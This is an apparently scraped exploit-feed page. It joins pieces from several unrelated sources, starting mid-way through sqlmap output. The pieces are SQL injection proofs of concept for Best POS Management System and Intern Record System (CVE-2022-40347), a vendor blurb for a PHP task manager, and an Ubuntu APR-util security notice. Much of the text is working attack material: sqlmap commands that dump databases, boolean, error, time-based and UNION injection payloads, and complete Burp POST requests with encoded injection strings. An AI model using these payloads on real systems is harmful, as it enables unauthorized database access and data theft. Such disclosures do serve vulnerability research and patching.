WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.

Submitted by razormist on Friday, August 26, 2022 - 22:47.

**Simple Task Managing System in PHP With MySQLi Free Source Code******Introduction****

The **Simple Task Managing System in PHP With MySQLi** is a simple web system coded in a **PHP** programming language. This project contains an advance coding script that display fully operational function of the system. The system contain many functionalities that use its purpose. This **Simple Task Managing System** is a project that can help students taking IT related courses. This is a simple system that tends to help beginners to start their php programming career . This **Simple Task Managing System in PHP With MySQLi** provide a learning references to help beginners learn to use **PHP** programming.

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is free to be downloaded just read the content below for more info. This application is for **educational purpose only**.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Basic Information**

*   **Language used:** PHP
*   **Front-end used:** HTML & CSS
*   **Coding Tool used:** Notepad++ or any text editor that can run php files
*   **Type:** Web Application
*   **Database used:** MySQLi

****About Simple Task Managing System in PHP With MySQLi****

The **Simple Task Managing System in PHP With MySQLi** was developed using **PHP** programming language. This is a user-friendly kind of application that can be easily modified to be used in your on working projects. The system contains a function that can allow user to create project title. The application is strictly protected by a user login information, you need to enter a correct username and password to fully access the feature of the system. The user can do many things in the system he/she can add new project, add task list, search projects. You can create your on project by going in the add project and enter the required field. Each project has a task list you can assign a task and change its status base on your project progression. This project tends to educate you on how to create a simple php system in a basic way.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Features**

*   **Display the Overall Project**
*   **Can add new Project**
*   **Each Project has a Task**
*   **You can assign you task**
*   **Display total task for each project**

****Sample System Screenshot**:**

****Login Page****

****Add Project Page****

****Project List Page****

****Add Task Page****

****Task List Page****

****Simple Task Managing System in PHP With MySQLi Free Source Code** Installation Guide**

1.  **Download** and **Install** any **local web server** such as **XAMPP, WAMP, etc.**
2.  **Download** the source code in this site
3.  **Open** your **XAMPP Control Panel** and start **Apache** and **MySQL**.
4.  **Extract** the **downloaded source code **zip** file**.
5.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
6.  **Browse** the **PHPMyAdmin** in a **browser**.
7.  **Create** a **new database** name it **tasker**.
8.  **Import** the attached **SQL**file. The file name is **tasker.sql** located inside the database folder.
9.  **Browse** the **Task Management System** in a **browser**. **http://localhost/Task%20Managing%20System%20in%20PHP/**.

**User Login Information**

**Username:** admin

**Password:** admin

That's all, The **Simple Task Managing System in PHP With MySQLi** was created fully functional using **PHP** language. I hope that this project can help you to what you are looking for. For more **projects and tutorials** please kindly visit this site. Enjoy Coding!

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is ready to be downloaded just kindly click the download button below.

**Related Projects & Tutorials**

Simple Task Managing System in PHP With MySQLi

*   4256 views

CVE-2022-40032: Simple Task Managing System in PHP With MySQLi Free Source Code

SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.

**CVE-2022-40347\_Intern-Record-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated**

CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Exploit Title: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Date: 2022-06-09

Exploit Author: Hamdi Sevben

Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/

Software Link: https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

Version: 1.0

Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53

CVE: CVE-2022-40347

References:

https://code-projects.org/intern-record-system-in-php-with-source-code/

https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

1.  Description:

Intern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.

2.  Proof of Concept:

In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.

Then run SQLmap to extract the data from the database:

sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "name" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "phone" --risk="3" --level="3" --method="POST" --data="phone=test&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

3.  Example payload:

\-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

4.  Burpsuite request on 'phone' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&email=&deptType=3&name=

5.  Burpsuite request on 'email' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&deptType=3&name=

6.  Burpsuite request on 'deptType' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 316

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&name=

7.  Burpsuite request on 'name' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=3&name=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

CVE-2022-40347: GitHub - h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated: CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Inje

Ubuntu Security Notice 5870-1 - Ronald Crane discovered that APR-util did not properly handled memory when encoding or decoding certain input data. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5870-1  
February 14, 2023

APR-util vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

APR-util could be made to crash or run programs as an administrator  
if it received specially crafted input.

Software Description:  
- apr-util: Apache Portable Runtime Utility Library

Details:

Ronald Crane discovered that APR-util did not properly handled memory when  
encoding or decoding certain input data. An attacker could possibly use  
this issue to cause a denial of service, or possibly execute arbitrary  
code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   libaprutil1                     1.6.1-5ubuntu4.22.10.1

Ubuntu 22.04 LTS:  
   libaprutil1                     1.6.1-5ubuntu4.22.04.1

Ubuntu 20.04 LTS:  
   libaprutil1                     1.6.1-4ubuntu2.1

Ubuntu 18.04 LTS:  
   libaprutil1                     1.6.1-2ubuntu0.1

Ubuntu 16.04 ESM:  
   libaprutil1                     1.5.4-1ubuntu0.1~esm2

Ubuntu 14.04 ESM:  
   libaprutil1                     1.5.3-1ubuntu0.1~esm2

After a standard system update you need to restart any application  
using APR-util libraries to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5870-1  
   CVE-2022-25147

Package Information:  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-5ubuntu4.22.10.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-5ubuntu4.22.04.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-4ubuntu2.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-2ubuntu0.1

Tag

#apache